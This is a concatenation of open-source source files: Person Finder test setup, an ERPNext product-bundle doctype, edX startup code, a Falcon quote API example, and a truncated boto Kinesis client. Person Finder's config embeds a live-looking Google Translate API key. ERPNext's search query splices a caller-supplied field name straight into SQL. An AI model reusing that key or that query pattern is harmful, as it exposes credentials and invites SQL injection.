subject types and messages will be updated; existing Subject or Report
information will not be changed or deleted.)"""
setup_repos()
setup_configs()
def wipe_datastore(delete=None, keep=None):
"""Deletes everything in the datastore. If 'delete' is given (a list of
kind names), deletes only those kinds of entities. If 'keep' is given,
skips deleting those kinds of entities."""
query = db.Query(keys_only=True)
keys = query.fetch(1000)
while keys:
db.delete([key for key in keys
if delete is None or key.kind() in delete
if keep is None or key.kind() not in keep])
keys = query.with_cursor(query.cursor()).fetch(1000)
def reset_datastore():
"""Wipes everything in the datastore except Accounts and Secrets,
then sets up the datastore for new data."""
wipe_datastore(keep=['Account', 'Secret'])
setup_datastore()
def setup_repos():
db.put([Repo(key_name='haiti'),
Repo(key_name='japan'),
Repo(key_name='pakistan')])
# Set some repositories active so they show on the main page.
config.set_for_repo('japan', launched=True)
config.set_for_repo('haiti', launched=True)
def setup_configs():
"""Installs configuration settings used for testing by server_tests."""
COMMON_KEYWORDS = ['person', 'people', 'finder', 'person finder',
'people finder', 'crisis', 'survivor', 'family']
# NOTE: the following two CAPTCHA keys are dummy keys for testing only.
# (https://developers.google.com/recaptcha/docs/faq)
# They should be replaced with real keys upon launch.
config.set(captcha_site_key='6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI',
captcha_secret_key='6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe',
# A Google Translate API key with a very low quota, just for testing.
translate_api_key='AIzaSyCXdz9x7LDL3BvieEP8Wcze64CC_iqslSE',
repo_aliases={},
referrer_whitelist=[])
config.set_for_repo(
'haiti',
# Appended to "Google Person Finder" in page titles.
repo_titles={
'en': 'Haiti Earthquake',
'fr': u'S\xe9isme en Ha\xefti',
'ht': u'Tranbleman T\xe8 an Ayiti',
'es': u'Terremoto en Hait\xed'
},
# List of language codes that appear in the language menu.
language_menu_options=['en', 'ht', 'fr', 'es'],
# Content for the <meta name="keywords"> tag.
keywords=', '.join([
'haiti', 'earthquake', 'haiti earthquake', 'haitian',
u'ha\xefti', u's\xe9isme', 'tremblement', 'tremblement de terre',
'famille', 'recherche de personnes', 'terremoto'
] + COMMON_KEYWORDS),
# If false, hide the family_name field and use only given_name.
use_family_name=True,
# Presentation order for the given name and family name.
family_name_first=False,
# If true, show extra fields for alternate names.
use_alternate_names=True,
# If false, hide the home_zip field.
use_postal_code=True,
# Require at least this many letters in each word of a text query.
min_query_word_length=2,
# Show input fields for profile URLs in create page.
show_profile_entry=True,
# Default list of profile websites to show in create page.
profile_websites=const.DEFAULT_PROFILE_WEBSITES,
# Default map viewport for the location field in the note form.
map_default_zoom=7,
map_default_center=[18.968637, -72.284546],
map_size_pixels=[400, 280],
# If true, the feeds and read API require an authorization key.
read_auth_key_required=False,
# If true, the search API requires an authorization key.
search_auth_key_required=False,
# If true, show "believed dead" option in the note status dropdown
allow_believed_dead_via_ui=True,
# Custom html messages to show on main page, results page, view page,
# and query form, keyed by language codes.
start_page_custom_htmls={'en': '', 'fr': ''},
results_page_custom_htmls={'en': '', 'fr': ''},
view_page_custom_htmls={'en': '', 'fr': ''},
seek_query_form_custom_htmls={'en': '', 'fr': ''},
published_date=get_timestamp(datetime(2010, 1, 12)),
updated_date=get_timestamp(datetime(2010, 1, 12)),
)
config.set_for_repo(
'japan',
language_menu_options=['ja', 'en', 'ko', 'zh-CN', 'zh-TW', 'pt-BR', 'es'],
repo_titles={
'en': '2011 Japan Earthquake',
'zh-TW': u'2011 \u65e5\u672c\u5730\u9707',
'zh-CN': u'2011 \u65e5\u672c\u5730\u9707',
'pt-BR': u'2011 Terremoto no Jap\xe3o',
'ja': u'2011 \u65e5\u672c\u5730\u9707',
'es': u'2011 Terremoto en Jap\xf3n'
},
keywords=', '.join(COMMON_KEYWORDS),
use_family_name=True,
family_name_first=True,
use_alternate_names=True,
use_postal_code=True,
min_query_word_length=1,
show_profile_entry=True,
profile_websites=const.DEFAULT_PROFILE_WEBSITES,
map_default_zoom=7,
map_default_center=[38, 140.7],
map_size_pixels=[400, 400],
search_auth_key_required=True,
read_auth_key_required=True,
allow_believed_dead_via_ui=True,
start_page_custom_htmls={'en': 'Custom message', 'fr': 'French'},
results_page_custom_htmls={'en': 'Custom message', 'fr': 'French'},
view_page_custom_htmls={'en': 'Custom message', 'fr': 'French'},
seek_query_form_custom_htmls={'en': '', 'fr': ''},
# NOTE(kpy): These two configuration settings only work for locations
# with a single, fixed time zone offset and no Daylight Saving Time.
time_zone_offset=9, # UTC+9
time_zone_abbreviation='JST',
jp_mobile_carrier_redirect=True,
published_date=get_timestamp(datetime(2011, 3, 11)),
updated_date=get_timestamp(datetime(2011, 3, 11)),
)
config.set_for_repo(
'pakistan',
repo_titles={
'en': 'Pakistan Floods',
'ur': u'\u067e\u0627\u06a9\u0633\u062a\u0627\u0646\u06cc \u0633\u06cc\u0644\u0627\u0628'
},
language_menu_options=['en', 'ur'],
keywords=', '.join([
'pakistan', 'flood', 'pakistan flood', 'pakistani'
] + COMMON_KEYWORDS),
use_family_name=False,
family_name_first=False,
use_alternate_names=False,
use_postal_code=False,
min_query_word_length=1,
map_default_zoom=6,
map_default_center=[33.36, 73.26], # near Rawalpindi, Pakistan
map_size_pixels=[400, 500],
read_auth_key_required=False,
search_auth_key_required=False,
allow_believed_dead_via_ui=True,
start_page_custom_htmls={'en': '', 'fr': ''},
results_page_custom_htmls={'en': '', 'fr': ''},
view_page_custom_htmls={'en': '', 'fr': ''},
seek_query_form_custom_htmls={'en': '', 'fr': ''},
published_date=get_timestamp(datetime(2010, 8, 6)),
updated_date=get_timestamp(datetime(2010, 8, 6)),
)
def setup_lang_test_config():
config.set_for_repo(
'lang-test',
# We set short titles to avoid exceeding the field's 500-char limit.
repo_titles=dict((lang, lang) for lang in const.LANGUAGE_ENDONYMS),
language_menu_options=list(const.LANGUAGE_ENDONYMS.keys()),
keywords=', '.join(COMMON_KEYWORDS),
use_family_name=True,
family_name_first=True,
use_alternate_names=True,
use_postal_code=True,
min_query_word_length=1,
map_default_zoom=6,
map_default_center=[0, 0],
map_size_pixels=[400, 500],
read_auth_key_required=False,
search_auth_key_required=False,
allow_believed_dead_via_ui=True,
start_page_custom_htmls={'en': '', 'fr': ''},
results_page_custom_htmls={'en': '', 'fr': ''},
view_page_custom_htmls={'en': '', 'fr': ''},
seek_query_form_custom_htmls={'en': '', 'fr': ''},
)
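# Hedged illustration (not part of the original file): the keep/delete filter
# inside wipe_datastore() applies two conditions to each key; this standalone
# sketch mimics it with a fake Key class so the selection logic can be read in
# isolation. FakeKey and the kind names are invented for illustration.
if __name__ == '__main__':
    class FakeKey(object):
        def __init__(self, kind):
            self._kind = kind
        def kind(self):
            return self._kind
    keys = [FakeKey('Person'), FakeKey('Note'), FakeKey('Account'), FakeKey('Secret')]
    keep, delete = ['Account', 'Secret'], None
    doomed = [key.kind() for key in keys
              if delete is None or key.kind() in delete
              if keep is None or key.kind() not in keep]
    print(doomed)  # ['Person', 'Note'] -- what reset_datastore() would delete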
|
apache-2.0
|
MartinEnder/erpnext-de
|
erpnext/selling/doctype/product_bundle/product_bundle.py
|
25
|
1166
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.document import Document
class ProductBundle(Document):
def autoname(self):
self.name = self.new_item_code
def validate(self):
self.validate_main_item()
from erpnext.utilities.transaction_base import validate_uom_is_integer
validate_uom_is_integer(self, "uom", "qty")
def validate_main_item(self):
"""Validates, main Item is not a stock item"""
if frappe.db.get_value("Item", self.new_item_code, "is_stock_item"):
frappe.throw(_("Parent Item {0} must not be a Stock Item").format(self.new_item_code))
def get_new_item_code(doctype, txt, searchfield, start, page_len, filters):
from erpnext.controllers.queries import get_match_cond
return frappe.db.sql("""select name, item_name, description from tabItem
where is_stock_item=0 and name not in (select name from `tabProduct Bundle`)
and %s like %s %s limit %s, %s""" % (searchfield, "%s",
get_match_cond(doctype),"%s", "%s"),
("%%%s%%" % txt, start, page_len))
|
agpl-3.0
|
Shrhawk/edx-platform
|
lms/startup.py
|
14
|
4770
|
"""
Module for code that should run during LMS startup
"""
# pylint: disable=unused-argument
from django.conf import settings
# Force settings to run so that the python path is modified
settings.INSTALLED_APPS # pylint: disable=pointless-statement
from openedx.core.lib.django_startup import autostartup
import edxmako
import logging
from monkey_patch import django_utils_translation
import analytics
log = logging.getLogger(__name__)
def run():
"""
Executed during django startup
"""
django_utils_translation.patch()
autostartup()
add_mimetypes()
if settings.FEATURES.get('USE_CUSTOM_THEME', False):
enable_theme()
if settings.FEATURES.get('USE_MICROSITES', False):
enable_microsites()
if settings.FEATURES.get('ENABLE_THIRD_PARTY_AUTH', False):
enable_third_party_auth()
# Initialize Segment.io analytics module. Flushes first time a message is received and
# every 50 messages thereafter, or if 10 seconds have passed since last flush
if settings.FEATURES.get('SEGMENT_IO_LMS') and hasattr(settings, 'SEGMENT_IO_LMS_KEY'):
analytics.init(settings.SEGMENT_IO_LMS_KEY, flush_at=50)
def add_mimetypes():
"""
Add extra mimetypes. Used in xblock_resource.
If you add a mimetype here, be sure to also add it in cms/startup.py.
"""
import mimetypes
mimetypes.add_type('application/vnd.ms-fontobject', '.eot')
mimetypes.add_type('application/x-font-opentype', '.otf')
mimetypes.add_type('application/x-font-ttf', '.ttf')
mimetypes.add_type('application/font-woff', '.woff')
def enable_theme():
"""
Enable the settings for a custom theme, whose files should be stored
in ENV_ROOT/themes/THEME_NAME (e.g., edx_all/themes/stanford).
"""
# Workaround for setting THEME_NAME to an empty
# string which is the default due to this ansible
# bug: https://github.com/ansible/ansible/issues/4812
if settings.THEME_NAME == "":
settings.THEME_NAME = None
return
assert settings.FEATURES['USE_CUSTOM_THEME']
settings.FAVICON_PATH = 'themes/{name}/images/favicon.ico'.format(
name=settings.THEME_NAME
)
# Calculate the location of the theme's files
theme_root = settings.ENV_ROOT / "themes" / settings.THEME_NAME
# Include the theme's templates in the template search paths
settings.TEMPLATE_DIRS.insert(0, theme_root / 'templates')
edxmako.paths.add_lookup('main', theme_root / 'templates', prepend=True)
# Namespace the theme's static files to 'themes/<theme_name>' to
# avoid collisions with default edX static files
settings.STATICFILES_DIRS.append(
(u'themes/{}'.format(settings.THEME_NAME), theme_root / 'static')
)
# Include theme locale path for django translations lookup
settings.LOCALE_PATHS = (theme_root / 'conf/locale',) + settings.LOCALE_PATHS
def enable_microsites():
"""
Enable the use of microsites, which are websites that allow
for subdomains for the edX platform, e.g. foo.edx.org
"""
microsites_root = settings.MICROSITE_ROOT_DIR
microsite_config_dict = settings.MICROSITE_CONFIGURATION
for ms_name, ms_config in microsite_config_dict.items():
# Calculate the location of the microsite's files
ms_root = microsites_root / ms_name
ms_config = microsite_config_dict[ms_name]
# pull in configuration information from each
# microsite root
if ms_root.isdir():
# store the path on disk for later use
ms_config['microsite_root'] = ms_root
template_dir = ms_root / 'templates'
ms_config['template_dir'] = template_dir
ms_config['microsite_name'] = ms_name
log.info('Loading microsite %s', ms_root)
else:
# not sure if we have application logging at this stage of
# startup
log.error('Error loading microsite %s. Directory does not exist', ms_root)
# remove from our configuration as it is not valid
del microsite_config_dict[ms_name]
# if we have any valid microsites defined, let's wire in the Mako and STATIC_FILES search paths
if microsite_config_dict:
settings.TEMPLATE_DIRS.append(microsites_root)
edxmako.paths.add_lookup('main', microsites_root)
settings.STATICFILES_DIRS.insert(0, microsites_root)
def enable_third_party_auth():
"""
Enable the use of third_party_auth, which allows users to sign in to edX
using other identity providers. For configuration details, see
common/djangoapps/third_party_auth/settings.py.
"""
from third_party_auth import settings as auth_settings
auth_settings.apply_settings(settings)
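# Hedged usage sketch (not part of the original module; importing this module
# already requires configured Django settings): once add_mimetypes() has run,
# the stdlib mimetypes module resolves the extra font types registered above.
if __name__ == '__main__':
    import mimetypes
    add_mimetypes()
    print(mimetypes.guess_type('glyphs.woff')[0])  # application/font-woff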
|
agpl-3.0
|
conda/kapsel
|
examples/quote_api/quote.py
|
1
|
4575
|
from argparse import ArgumentParser
import falcon
import gunicorn.app.base
import json
import multiprocessing
import sys
# A Falcon resource that returns the same quote every time
class QuoteResource(object):
def on_get(self, req, resp):
"""Handles GET requests"""
quote = {'quote': 'I\'ve always been more interested in the future than in the past.', 'author': 'Grace Hopper'}
resp.body = json.dumps(quote)
# A Falcon resource that explains what this server is
class IndexResource(object):
def __init__(self, prefix):
self.prefix = prefix
def on_get(self, req, resp):
"""Handles GET requests"""
resp.body = """
<html>
<head>
<title>Quote API Server</title>
</head>
<body>
<p>This is a toy JSON API server example.</p>
<p>Make a GET request to <a href="%s/quote">%s/quote</a></p>
</body>
</html>
""" % (self.prefix, self.prefix)
resp.content_type = "text/html"
resp.status = falcon.HTTP_200
# A Falcon middleware to implement validation of the Host header in requests
class HostFilter(object):
def __init__(self, hosts):
# falcon strips the port out of req.host, even if it isn't 80.
# This is probably a bug in Falcon, so we work around it here.
self.hosts = [falcon.util.uri.parse_host(host)[0] for host in hosts]
def process_request(self, req, resp):
# req.host has the port stripped from what the browser
# sent us, even when it isn't 80, which is probably a bug
# in Falcon. We deal with that in __init__ by removing
# ports from self.hosts.
if req.host not in self.hosts:
print("Attempted request with Host header '%s' denied" % req.host)
raise falcon.HTTPForbidden("Bad Host header", "Cannot connect via the provided hostname")
# the gunicorn application
class QuoteApplication(gunicorn.app.base.BaseApplication):
def __init__(self, port, prefix, hosts):
assert prefix is not None
assert port is not None
self.application = falcon.API(middleware=HostFilter(hosts))
# add_route is pedantic about this
if prefix != '' and not prefix.startswith("/"):
prefix = "/" + prefix
self.application.add_route(prefix + '/quote', QuoteResource())
self.application.add_route(prefix + "/", IndexResource(prefix))
self.port = port
super(QuoteApplication, self).__init__()
print("Only connections via these hosts are allowed: " + repr(hosts))
print("Starting API server. Try http://localhost:%s%s" % (self.port, prefix + '/quote'))
def load_config(self):
# Note that --kapsel-host is NOT this address; it is NOT
# the address to listen on. --kapsel-host specifies the
# allowed values of the Host header in an http request,
# which is totally different. Another way to put it is
# that --kapsel-host is the public hostname:port browsers will
# be connecting to.
self.cfg.set('bind', '%s:%s' % ('0.0.0.0', self.port))
self.cfg.set('workers', (multiprocessing.cpu_count() * 2) + 1)
def load(self):
return self.application
# arg parser for the standard kapsel options
parser = ArgumentParser(prog="quote-api", description="API server that returns a quote.")
parser.add_argument('--kapsel-host', action='append', help='Hostname to allow in requests')
parser.add_argument('--kapsel-no-browser', action='store_true', default=False, help='Disable opening in a browser')
parser.add_argument('--kapsel-use-xheaders',
action='store_true',
default=False,
help='Trust X-headers from reverse proxy')
parser.add_argument('--kapsel-url-prefix', action='store', default='', help='Prefix in front of urls')
parser.add_argument('--kapsel-port', action='store', default='8080', help='Port to listen on')
parser.add_argument('--kapsel-iframe-hosts',
action='append',
help='Space-separated hosts which can embed us in an iframe per our Content-Security-Policy')
if __name__ == '__main__':
# This app accepts but ignores --kapsel-no-browser because we never bother to open a browser,
# and accepts but ignores --kapsel-iframe-hosts since iframing an API makes no sense.
args = parser.parse_args(sys.argv[1:])
if not args.kapsel_host:
args.kapsel_host = ['localhost:' + args.kapsel_port]
QuoteApplication(port=args.kapsel_port, prefix=args.kapsel_url_prefix, hosts=args.kapsel_host).run()
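# Hedged usage sketch (not part of the original example; the port and host
# values below are illustrative):
#
#     python quote.py --kapsel-port 8080 --kapsel-host localhost:8080
#     curl http://localhost:8080/quote
#
# The request's Host header must match one of the --kapsel-host values;
# otherwise HostFilter.process_request() rejects it with HTTP 403 Forbidden.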
|
bsd-3-clause
|
ychen820/microblog
|
y/google-cloud-sdk/.install/.backup/platform/gsutil/third_party/boto/boto/kinesis/layer1.py
|
10
|
33127
|
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
try:
import json
except ImportError:
import simplejson as json
import base64
import boto
from boto.connection import AWSQueryConnection
from boto.regioninfo import RegionInfo
from boto.exception import JSONResponseError
from boto.kinesis import exceptions
class KinesisConnection(AWSQueryConnection):
"""
Amazon Kinesis Service API Reference
Amazon Kinesis is a managed service that scales elastically for
real time processing of streaming big data.
"""
APIVersion = "2013-12-02"
DefaultRegionName = "us-east-1"
DefaultRegionEndpoint = "kinesis.us-east-1.amazonaws.com"
ServiceName = "Kinesis"
TargetPrefix = "Kinesis_20131202"
ResponseError = JSONResponseError
_faults = {
"ProvisionedThroughputExceededException": exceptions.ProvisionedThroughputExceededException,
"LimitExceededException": exceptions.LimitExceededException,
"ExpiredIteratorException": exceptions.ExpiredIteratorException,
"ResourceInUseException": exceptions.ResourceInUseException,
"ResourceNotFoundException": exceptions.ResourceNotFoundException,
"InvalidArgumentException": exceptions.InvalidArgumentException,
"SubscriptionRequiredException": exceptions.SubscriptionRequiredException
}
def __init__(self, **kwargs):
region = kwargs.pop('region', None)
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint)
if 'host' not in kwargs:
kwargs['host'] = region.endpoint
super(KinesisConnection, self).__init__(**kwargs)
self.region = region
def _required_auth_capability(self):
return ['hmac-v4']
def create_stream(self, stream_name, shard_count):
"""
This operation adds a new Amazon Kinesis stream to your AWS
account. A stream captures and transports data records that
are continuously emitted from different data sources or
producers . Scale-out within an Amazon Kinesis stream is
explicitly supported by means of shards, which are uniquely
identified groups of data records in an Amazon Kinesis stream.
You specify and control the number of shards that a stream is
composed of. Each shard can support up to 5 read transactions
per second up to a maximum total of 2 MB of data read per
second. Each shard can support up to 1000 write transactions
per second up to a maximum total of 1 MB data written per
second. You can add shards to a stream if the amount of data
input increases and you can remove shards if the amount of
data input decreases.
The stream name identifies the stream. The name is scoped to
the AWS account used by the application. It is also scoped by
region. That is, two streams in two different accounts can
have the same name, and two streams in the same account, but
in two different regions, can have the same name.
`CreateStream` is an asynchronous operation. Upon receiving a
`CreateStream` request, Amazon Kinesis immediately returns and
sets the stream status to CREATING. After the stream is
created, Amazon Kinesis sets the stream status to ACTIVE. You
should perform read and write operations only on an ACTIVE
stream.
You receive a `LimitExceededException` when making a
`CreateStream` request if you try to do one of the following:
+ Have more than five streams in the CREATING state at any
point in time.
+ Create more shards than are authorized for your account.
**Note:** The default limit for an AWS account is two shards
per stream. If you need to create a stream with more than two
shards, contact AWS Support to increase the limit on your
account.
You can use the `DescribeStream` operation to check the stream
status, which is returned in `StreamStatus`.
`CreateStream` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: A name to identify the stream. The stream name is
scoped to the AWS account used by the application that creates the
stream. It is also scoped by region. That is, two streams in two
different AWS accounts can have the same name, and two streams in
the same AWS account, but in two different regions, can have the
same name.
:type shard_count: integer
:param shard_count: The number of shards that the stream will use. The
throughput of the stream is a function of the number of shards;
more shards are required for greater provisioned throughput.
**Note:** The default limit for an AWS account is two shards per
stream. If you need to create a stream with more than two shards,
contact AWS Support to increase the limit on your account.
"""
params = {
'StreamName': stream_name,
'ShardCount': shard_count,
}
return self.make_request(action='CreateStream',
body=json.dumps(params))
def delete_stream(self, stream_name):
"""
This operation deletes a stream and all of its shards and
data. You must shut down any applications that are operating
on the stream before you delete the stream. If an application
attempts to operate on a deleted stream, it will receive the
exception `ResourceNotFoundException`.
If the stream is in the ACTIVE state, you can delete it. After
a `DeleteStream` request, the specified stream is in the
DELETING state until Amazon Kinesis completes the deletion.
**Note:** Amazon Kinesis might continue to accept data read
and write operations, such as PutRecord and GetRecords, on a
stream in the DELETING state until the stream deletion is
complete.
When you delete a stream, any shards in that stream are also
deleted.
You can use the DescribeStream operation to check the state of
the stream, which is returned in `StreamStatus`.
`DeleteStream` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream to delete.
"""
params = {'StreamName': stream_name, }
return self.make_request(action='DeleteStream',
body=json.dumps(params))
def describe_stream(self, stream_name, limit=None,
exclusive_start_shard_id=None):
"""
This operation returns the following information about the
stream: the current status of the stream, the stream Amazon
Resource Name (ARN), and an array of shard objects that
comprise the stream. For each shard object there is
information about the hash key and sequence number ranges that
the shard spans, and the IDs of any earlier shards that played
a role in a MergeShards or SplitShard operation that
created the shard. A sequence number is the identifier
associated with every record ingested in the Amazon Kinesis
stream. The sequence number is assigned by the Amazon Kinesis
service when a record is put into the stream.
You can limit the number of returned shards using the `Limit`
parameter. The number of shards in a stream may be too large
to return from a single call to `DescribeStream`. You can
detect this by using the `HasMoreShards` flag in the returned
output. `HasMoreShards` is set to `True` when there is more
data available.
If there are more shards available, you can request more
shards by using the shard ID of the last shard returned by the
`DescribeStream` request, in the `ExclusiveStartShardId`
parameter in a subsequent request to `DescribeStream`.
`DescribeStream` is a paginated operation.
`DescribeStream` has a limit of 10 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream to describe.
:type limit: integer
:param limit: The maximum number of shards to return.
:type exclusive_start_shard_id: string
:param exclusive_start_shard_id: The shard ID of the shard to start
with for the stream description.
"""
params = {'StreamName': stream_name, }
if limit is not None:
params['Limit'] = limit
if exclusive_start_shard_id is not None:
params['ExclusiveStartShardId'] = exclusive_start_shard_id
return self.make_request(action='DescribeStream',
body=json.dumps(params))
def get_records(self, shard_iterator, limit=None, b64_decode=True):
"""
This operation returns one or more data records from a shard.
A `GetRecords` operation request can retrieve up to 10 MB of
data.
You specify a shard iterator for the shard that you want to
read data from in the `ShardIterator` parameter. The shard
iterator specifies the position in the shard from which you
want to start reading data records sequentially. A shard
iterator specifies this position using the sequence number of
a data record in the shard. For more information about the
shard iterator, see GetShardIterator.
`GetRecords` may return a partial result if the response size
limit is exceeded. You will get an error, but not a partial
result if the shard's provisioned throughput is exceeded, the
shard iterator has expired, or an internal processing failure
has occurred. Clients can request a smaller amount of data by
specifying a maximum number of returned records using the
`Limit` parameter. The `Limit` parameter can be set to an
integer value of up to 10,000. If you set the value to an
integer greater than 10,000, you will receive
`InvalidArgumentException`.
A new shard iterator is returned by every `GetRecords` request
in `NextShardIterator`, which you use in the `ShardIterator`
parameter of the next `GetRecords` request. When you
repeatedly read from an Amazon Kinesis stream use a
GetShardIterator request to get the first shard iterator to
use in your first `GetRecords` request and then use the shard
iterator returned in `NextShardIterator` for subsequent reads.
`GetRecords` can return `null` for the `NextShardIterator` to
reflect that the shard has been closed and that the requested
shard iterator would never have returned more data.
If no items can be processed because of insufficient
provisioned throughput on the shard involved in the request,
`GetRecords` throws `ProvisionedThroughputExceededException`.
:type shard_iterator: string
:param shard_iterator: The position in the shard from which you want to
start sequentially reading data records.
:type limit: integer
:param limit: The maximum number of records to return, which can be set
to a value of up to 10,000.
:type b64_decode: boolean
:param b64_decode: Decode the Base64-encoded ``Data`` field of records.
"""
params = {'ShardIterator': shard_iterator, }
if limit is not None:
params['Limit'] = limit
response = self.make_request(action='GetRecords',
body=json.dumps(params))
# Base64 decode the data
if b64_decode:
for record in response.get('Records', []):
record['Data'] = base64.b64decode(record['Data'])
return response
def get_shard_iterator(self, stream_name, shard_id, shard_iterator_type,
starting_sequence_number=None):
"""
This operation returns a shard iterator in `ShardIterator`.
The shard iterator specifies the position in the shard from
which you want to start reading data records sequentially. A
shard iterator specifies this position using the sequence
number of a data record in a shard. A sequence number is the
identifier associated with every record ingested in the Amazon
Kinesis stream. The sequence number is assigned by the Amazon
Kinesis service when a record is put into the stream.
You must specify the shard iterator type in the
`GetShardIterator` request. For example, you can set the
`ShardIteratorType` parameter to read exactly from the
position denoted by a specific sequence number by using the
AT_SEQUENCE_NUMBER shard iterator type, or right after the
sequence number by using the AFTER_SEQUENCE_NUMBER shard
iterator type, using sequence numbers returned by earlier
PutRecord, GetRecords or DescribeStream requests. You can
specify the shard iterator type TRIM_HORIZON in the request to
cause `ShardIterator` to point to the last untrimmed record in
the shard in the system, which is the oldest data record in
the shard. Or you can point to just after the most recent
record in the shard, by using the shard iterator type LATEST,
so that you always read the most recent data in the shard.
**Note:** Each shard iterator expires five minutes after it is
returned to the requester.
When you repeatedly read from an Amazon Kinesis stream use a
GetShardIterator request to get the first shard iterator to
use in your first `GetRecords` request and then use the shard
iterator returned by the `GetRecords` request in
`NextShardIterator` for subsequent reads. A new shard iterator
is returned by every `GetRecords` request in
`NextShardIterator`, which you use in the `ShardIterator`
parameter of the next `GetRecords` request.
If a `GetShardIterator` request is made too often, you will
receive a `ProvisionedThroughputExceededException`. For more
information about throughput limits, see the `Amazon Kinesis
Developer Guide`_.
`GetShardIterator` can return `null` for its `ShardIterator`
to indicate that the shard has been closed and that the
requested iterator will return no more data. A shard can be
closed by a SplitShard or MergeShards operation.
`GetShardIterator` has a limit of 5 transactions per second
per account per shard.
:type stream_name: string
:param stream_name: The name of the stream.
:type shard_id: string
:param shard_id: The shard ID of the shard to get the iterator for.
:type shard_iterator_type: string
:param shard_iterator_type:
Determines how the shard iterator is used to start reading data records
from the shard.
The following are the valid shard iterator types:
+ AT_SEQUENCE_NUMBER - Start reading exactly from the position denoted
by a specific sequence number.
+ AFTER_SEQUENCE_NUMBER - Start reading right after the position
denoted by a specific sequence number.
+ TRIM_HORIZON - Start reading at the last untrimmed record in the
shard in the system, which is the oldest data record in the shard.
+ LATEST - Start reading just after the most recent record in the
shard, so that you always read the most recent data in the shard.
:type starting_sequence_number: string
:param starting_sequence_number: The sequence number of the data record
in the shard from which to start reading.
"""
params = {
'StreamName': stream_name,
'ShardId': shard_id,
'ShardIteratorType': shard_iterator_type,
}
if starting_sequence_number is not None:
params['StartingSequenceNumber'] = starting_sequence_number
return self.make_request(action='GetShardIterator',
body=json.dumps(params))
def list_streams(self, limit=None, exclusive_start_stream_name=None):
"""
This operation returns an array of the names of all the
streams that are associated with the AWS account making the
`ListStreams` request. A given AWS account can have many
streams active at one time.
The number of streams may be too large to return from a single
call to `ListStreams`. You can limit the number of returned
streams using the `Limit` parameter. If you do not specify a
value for the `Limit` parameter, Amazon Kinesis uses the
default limit, which is currently 10.
You can detect if there are more streams available to list by
using the `HasMoreStreams` flag from the returned output. If
there are more streams available, you can request more streams
by using the name of the last stream returned by the
`ListStreams` request in the `ExclusiveStartStreamName`
parameter in a subsequent request to `ListStreams`. The group
of stream names returned by the subsequent request is then
added to the list. You can continue this process until all the
stream names have been collected in the list.
`ListStreams` has a limit of 5 transactions per second per
account.
:type limit: integer
:param limit: The maximum number of streams to list.
:type exclusive_start_stream_name: string
:param exclusive_start_stream_name: The name of the stream to start the
list with.
"""
params = {}
if limit is not None:
params['Limit'] = limit
if exclusive_start_stream_name is not None:
params['ExclusiveStartStreamName'] = exclusive_start_stream_name
return self.make_request(action='ListStreams',
body=json.dumps(params))
def merge_shards(self, stream_name, shard_to_merge,
adjacent_shard_to_merge):
"""
This operation merges two adjacent shards in a stream and
combines them into a single shard to reduce the stream's
capacity to ingest and transport data. Two shards are
considered adjacent if the union of the hash key ranges for
the two shards form a contiguous set with no gaps. For
example, if you have two shards, one with a hash key range of
276...381 and the other with a hash key range of 382...454,
then you could merge these two shards into a single shard that
would have a hash key range of 276...454. After the merge, the
single child shard receives data for all hash key values
covered by the two parent shards.
`MergeShards` is called when there is a need to reduce the
overall capacity of a stream because of excess capacity that
is not being used. The operation requires that you specify the
shard to be merged and the adjacent shard for a given stream.
For more information about merging shards, see the `Amazon
Kinesis Developer Guide`_.
If the stream is in the ACTIVE state, you can call
`MergeShards`. If a stream is in CREATING or UPDATING or
DELETING states, then Amazon Kinesis returns a
`ResourceInUseException`. If the specified stream does not
exist, Amazon Kinesis returns a `ResourceNotFoundException`.
You can use the DescribeStream operation to check the state of
the stream, which is returned in `StreamStatus`.
`MergeShards` is an asynchronous operation. Upon receiving a
`MergeShards` request, Amazon Kinesis immediately returns a
response and sets the `StreamStatus` to UPDATING. After the
operation is completed, Amazon Kinesis sets the `StreamStatus`
to ACTIVE. Read and write operations continue to work while
the stream is in the UPDATING state.
You use the DescribeStream operation to determine the shard
IDs that are specified in the `MergeShards` request.
If you try to operate on too many streams in parallel using
CreateStream, DeleteStream, `MergeShards` or SplitShard, you
will receive a `LimitExceededException`.
`MergeShards` has a limit of 5 transactions per second per
account.
:type stream_name: string
:param stream_name: The name of the stream for the merge.
:type shard_to_merge: string
:param shard_to_merge: The shard ID of the shard to combine with the
adjacent shard for the merge.
:type adjacent_shard_to_merge: string
:param adjacent_shard_to_merge: The shard ID of the adjacent shard for
the merge.
"""
params = {
'StreamName': stream_name,
'ShardToMerge': shard_to_merge,
'AdjacentShardToMerge': adjacent_shard_to_merge,
}
return self.make_request(action='MergeShards',
body=json.dumps(params))
def put_record(self, stream_name, data, partition_key,
explicit_hash_key=None,
sequence_number_for_ordering=None,
exclusive_minimum_sequence_number=None,
b64_encode=True):
"""
This operation puts a data record into an Amazon Kinesis
stream from a producer. This operation must be called to send
data from the producer into the Amazon Kinesis stream for
real-time ingestion and subsequent processing. The `PutRecord`
operation requires the name of the stream that captures,
